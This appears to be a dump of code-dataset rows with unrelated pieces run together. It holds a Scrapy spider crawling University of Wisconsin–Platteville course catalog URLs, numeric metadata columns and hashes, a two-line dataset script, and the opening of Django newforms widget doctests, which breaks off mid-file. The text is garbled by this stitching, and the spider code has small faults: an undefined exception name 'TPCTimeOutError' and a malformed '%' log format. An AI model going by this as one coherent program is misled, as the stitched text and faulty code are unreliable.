"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COUNSED/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/XGR",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDUSTDY/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/ISCM/XGR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHLSPHY/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/POLISCI/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PROJMGT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PSYCHLGY/XGR",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ACCTING/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGBUS/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGEDUC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGET/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/AGRIC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ANSCI/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/APC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ART/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/F/FORENSIC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/F/FRENCH/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GENENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOGRPHY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOLOGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GERMAN/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ECONOMIC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ELECTENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENERGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENGLISH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENGRPHYS/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENTRP/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENVENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENVHORT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ESL/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ETHNSTDY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CHEMSTRY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CHINESE/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CIVILENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COMPUTER/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COUNSPSY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CR-SPAN/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HHP/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/H/HISTORY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDSTENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDUSTDY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MATH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MECHENG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MEDIA/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MSNT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUAP/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUSIC/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BIOLOGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BUSADMIN/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHLSPHY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHSC/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PHYSICS/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/POLISCI/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PORTUG/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/P/PSYCHLGY/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SCSCI/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SEJ/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SOCIOLGY/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SOFTWARE/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPANISH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/SPEECH/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/S/STAT/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/TEACHING/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/T/THEATRE/UGRD",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ACCTING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGBUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGEDUC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGET", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/AGRIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ANSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/APC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ART", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BIOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/BUSADMIN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHEMSTRY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CHINESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CIVILENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COMPUTER", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/COUNSED", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/CRIMLJUS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/DEL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ECONOMIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ELECTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENERGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGLISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENGRPHYS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENTRP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BIOLOGY/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BUSADMIN/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CIVILENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COMPUTER/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GENENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOGRPHY/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ECONOMIC/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENERGY/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ETHNSTDY/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MATH/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MECHENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MEDIA/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUSIC/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ACCTING/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/APC/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDSTENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDUSTDY/XUG",
]
def start_requests( self ):
for u in self.start_urls:
yield scrapy.Request( u, callback = self.parse_httpbin,
errback = self.errback_httpbin,
dont_filter = True )
def parse_httpbin( self, response ):
self.logger.info("Go successful respinse {}".format(response.url))
items = PlatevilleLinksItem()
links = response.xpath('*//a/@href').extract()
items['links'] = links
yield items
def errback_httpbin( self, failure):
# log all failures
self.logger.error(repr(failure))
# in case you want to do something special for some errors,
# you may need the non-200 response
if failure.check(HttpError):
# These exception come from HttpError spider middleware
# you can get non-200 response
response = failure.value.response
self.logger.error("HttpError on %s", response.url )
elif failure.check(DNSLookupError):
# This is the original request
request = failure.request
self.logger.error('DNSLookupError on %', request.url)
elif failure.check( TimeoutError, TPCTimeOutError ):
request = failure.request
self.logger.error('TimeoutError on %s', request.url)
| 270.791667 | 2,993 | 0.795261 | 4,044 | 32,495 | 6.38724 | 0.047478 | 0.154859 | 0.355285 | 0.401626 | 0.950445 | 0.948122 | 0.942393 | 0.942005 | 0.942005 | 0.935927 | 0 | 0.034348 | 0.033267 | 32,495 | 119 | 2,994 | 273.067227 | 0.787897 | 0.00677 | 0 | 0.170732 | 0 | 1.402439 | 0.893752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036585 | false | 0.536585 | 0.134146 | 0 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 13 |
c4af7396c31a34c941791964e496e890de1024ed | 149 | py | Python | make_data.py | K-ona/Feature-Based-DL-Classifier | c332b3ebec1e9b328b4b980f905c722e67b1fadb | [
"Apache-2.0"
] | null | null | null | make_data.py | K-ona/Feature-Based-DL-Classifier | c332b3ebec1e9b328b4b980f905c722e67b1fadb | [
"Apache-2.0"
] | null | null | null | make_data.py | K-ona/Feature-Based-DL-Classifier | c332b3ebec1e9b328b4b980f905c722e67b1fadb | [
"Apache-2.0"
] | null | null | null | from data import make_dataset
import numpy as np
make_dataset('./data/training_data/final_cleaned1.csv', './data/training_data/equal_data_all.csv') | 29.8 | 98 | 0.812081 | 24 | 149 | 4.75 | 0.583333 | 0.192982 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007246 | 0.073826 | 149 | 5 | 98 | 29.8 | 0.818841 | 0 | 0 | 0 | 0 | 0 | 0.52 | 0.52 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4844267b434dd474849c7ff4e02f749a68241a63 | 154,646 | py | Python | django/tests/regressiontests/forms/tests.py | jonaustin/advisoryscan | ba452c155f0d478450e0c91de5ea00f404e98616 | [
"MIT"
] | null | null | null | django/tests/regressiontests/forms/tests.py | jonaustin/advisoryscan | ba452c155f0d478450e0c91de5ea00f404e98616 | [
"MIT"
] | null | null | null | django/tests/regressiontests/forms/tests.py | jonaustin/advisoryscan | ba452c155f0d478450e0c91de5ea00f404e98616 | [
"MIT"
] | 1 | 2018-12-06T12:50:52.000Z | 2018-12-06T12:50:52.000Z | # -*- coding: utf-8 -*-
from localflavor import localflavor_tests
from regressions import regression_tests
form_tests = r"""
>>> from django.newforms import *
>>> import datetime
>>> import time
>>> import re
>>> try:
... from decimal import Decimal
... except ImportError:
... from django.utils._decimal import Decimal
###########
# Widgets #
###########
Each Widget class corresponds to an HTML form widget. A Widget knows how to
render itself, given a field name and some data. Widgets don't perform
validation.
# TextInput Widget ############################################################
>>> w = TextInput()
>>> w.render('email', '')
u'<input type="text" name="email" />'
>>> w.render('email', None)
u'<input type="text" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="text" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="text" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="text" name="email" value="test@example.com" class="fun" />'
# Note that doctest in Python 2.4 (and maybe 2.5?) doesn't support non-ascii
# characters in output, so we're displaying the repr() here.
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="text" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = TextInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="text" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="text" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = TextInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="text" class="special" name="email" />'
# PasswordInput Widget ############################################################
>>> w = PasswordInput()
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="password" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="password" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="password" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = PasswordInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="password" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="password" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = PasswordInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="password" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="password" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
The render_value argument lets you specify whether the widget should render
its value. You may want to do this for security reasons.
